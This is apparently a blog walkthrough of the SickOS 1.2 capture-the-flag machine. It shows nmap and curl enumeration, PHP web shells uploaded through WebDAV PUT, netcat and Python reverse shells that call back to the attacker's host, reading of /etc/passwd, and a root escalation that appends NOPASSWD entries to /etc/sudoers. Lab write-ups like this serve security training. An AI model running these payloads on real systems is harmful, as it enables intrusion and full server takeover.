Pages

SickOS 1.2

SickOS 1.2 -- Walkthrough

Nmap scan report for 192.168.0.105
Host is up (0.0089s latency).
MAC Address: AA:AA:AA:AA:AA:AA (Unknown)


PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http


From the website we have an image and nothing else.
No info in source code
No info from Dirb
Nothing from Nikto

Hmm so lets take a look at the image more closely...


-- identify -verbose 1.jpg

Nothing interesting in here...


so now lets look at the directory listing under 'Test'
We can use Curl to tell us http Methods that we may not of found directly
from the nmap -A scan.


user@logikz: curl -X OPTIONS http://192.168.0.105/test -v
*   Trying 192.168.0.105...
* TCP_NODELAY set
* Connected to 192.168.0.105 (192.168.0.105) port 80 (#0)
> OPTIONS /test HTTP/1.1
> Host: 192.168.0.105
> User-Agent: curl/7.52.1
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Location: http://192.168.0.105/test/
< Content-Length: 0
< Date: Sun, 19 Nov 2017 18:18:26 GMT
< Server: lighttpd/1.4.28
<
* Curl_http_done: called premature == 0
* Connection #0 to host 192.168.0.105 left intact

We can see the option for 'PUT' is allowed. This means we should be able to place a file on the server.

curl -X PUT http://192.168.0.105/test/python-backdoor-2.py --upload-file python-backdoor-2.py
This failed

Lets try adding our own code directly into a file liek so..

curl -v -X PUT -d '<?php system ($_GET[“cmd”]); ?>' http://192.168.0.105/test/shell.php


Now we can execute system command using the "cmd" prefix

Also we can just execute one command
curl -v -X PUT -d '<?php echo shell_exec("whoami"); ?>' http://192.168.0.105/test/shell3.php
curl -v -X PUT -d '<?php echo shell_exec("cat /etc/passwd"); ?>' http://192.168.0.105/test/shell3.php

This gives us the following...
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin


So we have a user account called "john"


So now lets see if we can create a reverse shell.
curl -v -X PUT -d '<?php echo shell_exec("/bin/nc 192.168.0.100 8484"); ?>' http://192.168.0.105/test/nc.php

dint work ...

try this

curl -v -X PUT -d '<?php echo `whoami`; ?>' http://192.168.0.105/test/whoami.php
We can also run commands ourselves like so. using the 'cmd' parameter

curl -v -X PUT -d '<?php passthru($_GET['cmd']); ?>' http://192.168.0.105/test/cmd.php

http://192.168.0.105/test/cmd.php?cmd=mkfifo /tmp/mkbkikk; /bin/nc 192.168.0.100 8989 0%3C/tmp/mkbkikk | /bin/sh %3E/tmp/mkbkikk 2%3E&1; rm /tmp/mkbkikk

nope doesnt work...

next i try to see what ports are open locally on the machine.

Usually i can do this by pipiing the output with 'tee' to a file then reading the file..

http://192.168.0.105/test/cmd.php?cmd=/bin/nc%20-z%20-v%20192.168.0.105%201-100%20|&%20/usr/bin/tee%20test.txt

this works on my pc but not on the box :-(

ARRR!!!




eventually the answer was found was -

http://192.168.0.105/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

Whilst waiting for a connection with;

sudo nc -l -p 443 -v

$


Next we move the python backdoor onto the server like so.. We can use nc through the exsiting nc on a different port 8889


awer@logikz:/opt/enumeration sudo nc -v -w 40 -p 443 -l < python-backdoor-2.py                 1 ↵
[sudo] password for awer:
listening on [any] 443 ...
192.168.0.105: inverse host lookup failed: Unknown host
connect to [192.168.0.100] from (UNKNOWN) [192.168.0.105] 41808


$ nc -v -w 10 192.168.0.100 443 > python-backdoor-2.py
Connection to 192.168.0.100 443 port [tcp/https] succeeded!


we can upload the pentest monkey backdoor and get a shell but this doesnt gives us a TTY shell so is of no use..


we look at the SUID bits - find / -perm -u=s -type f -ls 2>/dev/null

$ find / -perm -u=s -type f -ls 2>/dev/null
find / -perm -u=s -type f -ls 2>/dev/null
667707  268 -rwsr-xr--   1 root     dip        273272 Feb  4  2011 /usr/sbin/pppd
667843   20 -rwsr-sr-x   1 libuuid  libuuid     17976 Mar 29  2012 /usr/sbin/uuidd
786948    8 -rwsr-xr-x   1 root     root         5564 Dec 13  2011 /usr/lib/eject/dmcrypt-get-device
1055122  244 -rwsr-xr-x   1 root     root       248056 Jan 13  2016 /usr/lib/openssh/ssh-keysign
668412   12 -rwsr-xr-x   1 root     root         9728 Feb 16  2016 /usr/lib/pt_chown
668120   12 -r-sr-xr-x   1 root     root         9532 Mar 30  2016 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
668337   16 -r-sr-xr-x   1 root     root        14320 Mar 30  2016 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
1182917  312 -rwsr-xr--   1 root     messagebus   316824 Jun 13  2013 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
660925   72 -rwsr-xr-x   2 root     root        69708 Feb 27  2013 /usr/bin/sudoedit
667308   16 -rwsr-xr-x   1 root     root        14012 Nov  8  2011 /usr/bin/traceroute6.iputils
660925   72 -rwsr-xr-x   2 root     root        69708 Feb 27  2013 /usr/bin/sudo
659044   32 -rwsr-xr-x   1 root     root        31748 Sep 12  2012 /usr/bin/chsh
659043   44 -rwsr-xr-x   1 root     root        41284 Sep 12  2012 /usr/bin/passwd
659041   40 -rwsr-xr-x   1 root     root        40292 Sep 12  2012 /usr/bin/chfn
667072   44 -rwsr-sr-x   1 daemon   daemon      42800 Oct 25  2011 /usr/bin/at
667649   56 -rwsr-xr-x   1 root     root        56208 Jul 28  2011 /usr/bin/mtr
659047   60 -rwsr-xr-x   1 root     root        57956 Sep 12  2012 /usr/bin/gpasswd
658916   32 -rwsr-xr-x   1 root     root        30896 Sep 12  2012 /usr/bin/newgrp
1179695   88 -rwsr-xr-x   1 root     root        88760 Mar 29  2012 /bin/mount
1179715   40 -rwsr-xr-x   1 root     root        39116 Nov  8  2011 /bin/ping6
1182983   28 -rwsr-xr-x   1 root     root        26252 Mar  2  2012 /bin/fusermount
1179696   68 -rwsr-xr-x   1 root     root        67720 Mar 29  2012 /bin/umount
1179714   36 -rwsr-xr-x   1 root     root        34740 Nov  8  2011 /bin/ping
1179689   32 -rwsr-xr-x   1 root     root        31116 Sep 12  2012 /bin/su




Check what services are running

service --status-all

Only ssh service is running.

We try to brute force the user 'john'

lets change into a TTY shell

python -c 'import pty; pty.spawn("/bin/bash")'



#TESTING#
printf "%s\n" '#!/bin/bash' "echo 'john:password' | chpasswd" "echo 'john ALL=(ALL:ALL) ALL' >> /etc/sudoers" "touch /tmp/root.py" "chmod 777 /tmp/root.py" "chown root:root /tmp/root.py" > update
printf "%s\n" '#!/bin/bash' "echo 'john:password' | chpasswd" "chmod 777 /etc/sudoers" "echo 'john ALL=(ALL:ALL) ALL' >> /etc/sudoers" "touch /tmp/test-1.py" "chmod 777 /tmp/test-1.sh" "chown root:root /tmp/test-1.sh" "chmod 440 /etc/sudoers" > update
http://192.168.0.105/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27
http://192.168.0.105/test/cmd.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.100",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Finally we decide to add the www-data user to the sudoers file.

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

Then a simple 'sudo su'
and we have r00t






No comments:

Post a Comment